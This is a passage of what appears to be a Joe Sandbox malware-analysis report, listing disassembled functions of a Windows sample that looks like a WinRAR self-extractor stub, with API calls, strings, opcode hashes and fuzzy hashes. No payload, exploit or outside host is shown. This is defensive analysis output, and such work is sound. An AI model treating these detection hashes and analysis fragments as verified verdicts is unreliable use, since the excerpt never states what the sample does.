                                    • _free.LIBCMT ref: 0036C2F1
                                    • _free.LIBCMT ref: 0036C2FC
                                    • _free.LIBCMT ref: 0036C334
                                    • _free.LIBCMT ref: 0036C33B
                                    • _free.LIBCMT ref: 0036C358
                                    • _free.LIBCMT ref: 0036C370
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                    • String ID: P7
                                    • API String ID: 161543041-1475978607
                                    • Opcode ID: 7b33ed955850d49cc1102e3c03015fbf3a96edb013d59ec2799dd36cf0217c48
                                    • Instruction ID: 402da6e4da00198c5ae0788150ef2b9afb0ee4569eba925b718c3c8e2c8fffef
                                    • Opcode Fuzzy Hash: 7b33ed955850d49cc1102e3c03015fbf3a96edb013d59ec2799dd36cf0217c48
                                    • Instruction Fuzzy Hash: 193190316002059FEB239B79D985B66B3E9FF04314F22D929E488DB659DF75EC40CB60
                                    Function 0035CD2E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetWindow.USER32(?,00000005), ref: 0035CD51
                                    • GetClassNameW.USER32(00000000,?,00000800), ref: 0035CD7D
                                      • Part of subcall function 003517AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0034BB05,00000000,.exe,?,?,00000800,?,?,003585DF,?), ref: 003517C2
                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0035CD99
                                    • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0035CDB0
                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0035CDC4
                                    • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0035CDED
                                    • DeleteObject.GDI32(00000000), ref: 0035CDF4
                                    • GetWindow.USER32(00000000,00000002), ref: 0035CDFD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                    • String ID: STATIC
                                    • API String ID: 3820355801-1882779555
                                    • Opcode ID: 697d1e391bf7d20c47084674ab156ce1448353336678434420f4d42ec6be12d5
                                    • Instruction ID: 4b99fcbd2e8f4e716874b8113897eac5fc34f4a927f5c7b2ea5a410fa22ae210
                                    • Opcode Fuzzy Hash: 697d1e391bf7d20c47084674ab156ce1448353336678434420f4d42ec6be12d5
                                    • Instruction Fuzzy Hash: 3A110A32540310BFE233AB64DC0AF9F76ACEF56743F014421FE42E50B2CA64890D96A4
                                    Function 00368EB1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 00368EC5
                                      • Part of subcall function 003684DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0036BFA7,00373958,00000000,00373958,00000000,?,0036BFCE,00373958,00000007,00373958,?,0036C3CB,00373958), ref: 003684F4
                                      • Part of subcall function 003684DE: GetLastError.KERNEL32(00373958,?,0036BFA7,00373958,00000000,00373958,00000000,?,0036BFCE,00373958,00000007,00373958,?,0036C3CB,00373958,00373958), ref: 00368506
                                    • _free.LIBCMT ref: 00368ED1
                                    • _free.LIBCMT ref: 00368EDC
                                    • _free.LIBCMT ref: 00368EE7
                                    • _free.LIBCMT ref: 00368EF2
                                    • _free.LIBCMT ref: 00368EFD
                                    • _free.LIBCMT ref: 00368F08
                                    • _free.LIBCMT ref: 00368F13
                                    • _free.LIBCMT ref: 00368F1E
                                    • _free.LIBCMT ref: 00368F2C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 526cff7cb412213af73142ec424b81c26b5bb69b5a85842750a1a4c69f66a933
                                    • Instruction ID: 133b9572c0995ce1bb8644bea260b43d08d5cec0b839ce2464ede3d9b810ce25
                                    • Opcode Fuzzy Hash: 526cff7cb412213af73142ec424b81c26b5bb69b5a85842750a1a4c69f66a933
                                    • Instruction Fuzzy Hash: 7F11A47650010DAFCB13EF55C882CDE7BA5FF08354B5282A5BA088F62ADE31DA519B80
                                    Function 00342162 Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 480COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ;%u$x%u$xc%u
                                    • API String ID: 0-2277559157
                                    • Opcode ID: 07e954eedf6f09497a4be65d48764b4549d213a8bab2c7d68ddba4c7a6bb7883
                                    • Instruction ID: 6ecfdf1fbcaf6c2d4263c2ef8b77f2363b41fe030ba20aac282789a9fbfbc7db
                                    • Opcode Fuzzy Hash: 07e954eedf6f09497a4be65d48764b4549d213a8bab2c7d68ddba4c7a6bb7883
                                    • Instruction Fuzzy Hash: DEF1F5716042405BDB17EF248895BFF7BD9AF91300F494469F885AF287DA68B848C7A2
                                    Function 0035ACD0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0034130B: GetDlgItem.USER32(00000000,00003021), ref: 0034134F
                                      • Part of subcall function 0034130B: SetWindowTextW.USER32(00000000,003735B4), ref: 00341365
                                    • EndDialog.USER32(?,00000001), ref: 0035AD20
                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 0035AD47
                                    • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0035AD60
                                    • SetWindowTextW.USER32(?,?), ref: 0035AD71
                                    • GetDlgItem.USER32(?,00000065), ref: 0035AD7A
                                    • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0035AD8E
                                    • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0035ADA4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: MessageSend$Item$TextWindow$Dialog
                                    • String ID: LICENSEDLG
                                    • API String ID: 3214253823-2177901306
                                    • Opcode ID: db92ea72387f8d7b90e106a7912b5043ef6a8e561cee1fd5ba470b27151b7ee6
                                    • Instruction ID: 09d7dd890ce61632b8759e045bac6cbdc17d99aec1f3b244b750f7d40b0219d0
                                    • Opcode Fuzzy Hash: db92ea72387f8d7b90e106a7912b5043ef6a8e561cee1fd5ba470b27151b7ee6
                                    • Instruction Fuzzy Hash: 1321A632240605BBD223AF65ED49E3B3BBCEB47747F020115FA45968B0DB625D05E732
                                    Function 00349443 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00349448
                                    • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 0034946B
                                    • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 0034948A
                                      • Part of subcall function 003517AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0034BB05,00000000,.exe,?,?,00000800,?,?,003585DF,?), ref: 003517C2
                                    • _swprintf.LIBCMT ref: 00349526
                                      • Part of subcall function 0034400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0034401D
                                    • MoveFileW.KERNEL32(?,?), ref: 00349595
                                    • MoveFileW.KERNEL32(?,?), ref: 003495D5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                                    • String ID: rtmp%d
                                    • API String ID: 2111052971-3303766350
                                    • Opcode ID: 9ee10de984d9b625d34680529d1bc225ce41cadfa82a2079417f2266fa37d5bb
                                    • Instruction ID: 68e209566217891810f5d4000080f1ca605347a18165c493e388c227ca456bee
                                    • Opcode Fuzzy Hash: 9ee10de984d9b625d34680529d1bc225ce41cadfa82a2079417f2266fa37d5bb
                                    • Instruction Fuzzy Hash: 2241747190015866CF32EB608C85FDB73BCAF15390F0544E6B549EB052EB38AB88CB60
                                    Function 00358E62 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 125memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00358F38
                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00358F59
                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 00358F80
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: Global$AllocByteCharCreateMultiStreamWide
                                    • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                    • API String ID: 4094277203-4209811716
                                    • Opcode ID: e0dda7593c845fef5c84313b3bccbded0eb841467937ed50e1890501f3924e65
                                    • Instruction ID: 91a4cf21c589f9fddc4359418c7f1624a75a6fd50b1bb73c18f0890cd9893e24
                                    • Opcode Fuzzy Hash: e0dda7593c845fef5c84313b3bccbded0eb841467937ed50e1890501f3924e65
                                    • Instruction Fuzzy Hash: 5C312831508311BBD723BB24AC06FAB77ACDF46721F00451AFD06AB1E1EF649A0D83A1
                                    Function 00368FA5 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetLastError.KERNEL32(?,00380EE8,00363E14,00380EE8,?,?,00363713,00000050,?,00380EE8,00000200), ref: 00368FA9
                                    • _free.LIBCMT ref: 00368FDC
                                    • _free.LIBCMT ref: 00369004
                                    • SetLastError.KERNEL32(00000000,?,00380EE8,00000200), ref: 00369011
                                    • SetLastError.KERNEL32(00000000,?,00380EE8,00000200), ref: 0036901D
                                    • _abort.LIBCMT ref: 00369023
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: ErrorLast$_free$_abort
                                    • String ID: X7
                                    • API String ID: 3160817290-1737092782
                                    • Opcode ID: 56f13a773d7501effd60042e9c798700099b75b92625a3adb4497dc8e6462e40
                                    • Instruction ID: 563f329798de678043686c3b65411e32c14210952fb91feff59497d81249c1ee
                                    • Opcode Fuzzy Hash: 56f13a773d7501effd60042e9c798700099b75b92625a3adb4497dc8e6462e40
                                    • Instruction Fuzzy Hash: 1DF02835504A106AC63333687C4AB6B2D2E9FC9760F26C215F51AEA29EEE20CD416021
                                    Function 00350A8A Relevance: 12.1, APIs: 8, Instructions: 115timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • __aulldiv.LIBCMT ref: 00350A9D
                                      • Part of subcall function 0034ACF5: GetVersionExW.KERNEL32(?), ref: 0034AD1A
                                    • FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00350AC0
                                    • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00350AD2
                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00350AE3
                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00350AF3
                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00350B03
                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00350B3D
                                    • __aullrem.LIBCMT ref: 00350BCB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                    • String ID:
                                    • API String ID: 1247370737-0
                                    • Opcode ID: d91e605ad8e91ac8773c352f3796f9a6b69b8e1c3acea0fb7d7186f5c4b72240
                                    • Instruction ID: 9397618b166537b7fce18d286e98eb72d9fa566e45f122c5aeefe6e53614aea9
                                    • Opcode Fuzzy Hash: d91e605ad8e91ac8773c352f3796f9a6b69b8e1c3acea0fb7d7186f5c4b72240
                                    • Instruction Fuzzy Hash: 624129B14083069FC315DF65C8809ABFBF8FB88715F004E2EF99692650E739E548DB52
                                    Function 0036EE2D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,0036F5A2,?,00000000,?,00000000,00000000), ref: 0036EE6F
                                    • __fassign.LIBCMT ref: 0036EEEA
                                    • __fassign.LIBCMT ref: 0036EF05
                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 0036EF2B
                                    • WriteFile.KERNEL32(?,?,00000000,0036F5A2,00000000,?,?,?,?,?,?,?,?,?,0036F5A2,?), ref: 0036EF4A
                                    • WriteFile.KERNEL32(?,?,00000001,0036F5A2,00000000,?,?,?,?,?,?,?,?,?,0036F5A2,?), ref: 0036EF83
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                    • String ID:
                                    • API String ID: 1324828854-0
                                    • Opcode ID: b943286e5ae73357425b5611b7941e8d212928ba9681e0f4183ca6af2e7bcc63
                                    • Instruction ID: 07bd3c202d1cc6f66702ab98558659d13683c321d558c4824be959620966cacc
                                    • Opcode Fuzzy Hash: b943286e5ae73357425b5611b7941e8d212928ba9681e0f4183ca6af2e7bcc63
                                    • Instruction Fuzzy Hash: B951F674A002089FCB12CFA8DC41AEEBBF9FF09700F15851AE955EB291D730D944CB60
                                    Function 0035C534 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetTempPathW.KERNEL32(00000800,?), ref: 0035C54A
                                    • _swprintf.LIBCMT ref: 0035C57E
                                      • Part of subcall function 0034400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0034401D
                                    • SetDlgItemTextW.USER32(?,00000066,0038946A), ref: 0035C59E
                                    • _wcschr.LIBVCRUNTIME ref: 0035C5D1
                                    • EndDialog.USER32(?,00000001), ref: 0035C6B2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                                    • String ID: %s%s%u
                                    • API String ID: 2892007947-1360425832
                                    • Opcode ID: 77f433deaf3c0b2685f7d8fc12234a5d6a5f1d95e62c69b3713baaa1e3645f90
                                    • Instruction ID: 567f5dc9a5579f3f2f6148d1a3f9abe4d8f57d42b6145d0d1a16104bb82cb183
                                    • Opcode Fuzzy Hash: 77f433deaf3c0b2685f7d8fc12234a5d6a5f1d95e62c69b3713baaa1e3645f90
                                    • Instruction Fuzzy Hash: E6417471910718AEEF27DBA0DC45FEA77BCAB08306F0450A6E909DB061E7719BC8CB50
                                    Function 00359635 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108COMMON
                                    Download Yara Rule
                                    APIs
                                    • ShowWindow.USER32(?,00000000), ref: 0035964E
                                    • GetWindowRect.USER32(?,00000000), ref: 00359693
                                    • ShowWindow.USER32(?,00000005,00000000), ref: 0035972A
                                    • SetWindowTextW.USER32(?,00000000), ref: 00359732
                                    • ShowWindow.USER32(00000000,00000005), ref: 00359748
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: Window$Show$RectText
                                    • String ID: RarHtmlClassName
                                    • API String ID: 3937224194-1658105358
                                    • Opcode ID: 92644c7ccdc6722cca7221774096c3c9650f2130d825c460386dbd089fe87b6a
                                    • Instruction ID: ea29488b0d8f1d65bb0215b1f17e5e15b8565bcc21b5a6a3a42ec587e6098329
                                    • Opcode Fuzzy Hash: 92644c7ccdc6722cca7221774096c3c9650f2130d825c460386dbd089fe87b6a
                                    • Instruction Fuzzy Hash: 4931C131004200EFCB139F68DC88F6B7BACEF49712F05855AFE499A166DB34D949CB61
                                    Function 0036BFB5 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0036BF79: _free.LIBCMT ref: 0036BFA2
                                    • _free.LIBCMT ref: 0036C003
                                      • Part of subcall function 003684DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0036BFA7,00373958,00000000,00373958,00000000,?,0036BFCE,00373958,00000007,00373958,?,0036C3CB,00373958), ref: 003684F4
                                      • Part of subcall function 003684DE: GetLastError.KERNEL32(00373958,?,0036BFA7,00373958,00000000,00373958,00000000,?,0036BFCE,00373958,00000007,00373958,?,0036C3CB,00373958,00373958), ref: 00368506
                                    • _free.LIBCMT ref: 0036C00E
                                    • _free.LIBCMT ref: 0036C019
                                    • _free.LIBCMT ref: 0036C06D
                                    • _free.LIBCMT ref: 0036C078
                                    • _free.LIBCMT ref: 0036C083
                                    • _free.LIBCMT ref: 0036C08E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                                    • Instruction ID: cc9fb59e7a9013f53cd724d0cfe276e558706c8b7349945cb4923d1e916be79e
                                    • Opcode Fuzzy Hash: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                                    • Instruction Fuzzy Hash: F6111A71540B08FAD622BBB1DC4AFCBF7996F04700F40C925B299AE466DF65E9448E90
                                    Function 003620CA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetLastError.KERNEL32(?,?,003620C1,0035FB12), ref: 003620D8
                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 003620E6
                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 003620FF
                                    • SetLastError.KERNEL32(00000000,?,003620C1,0035FB12), ref: 00362151
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
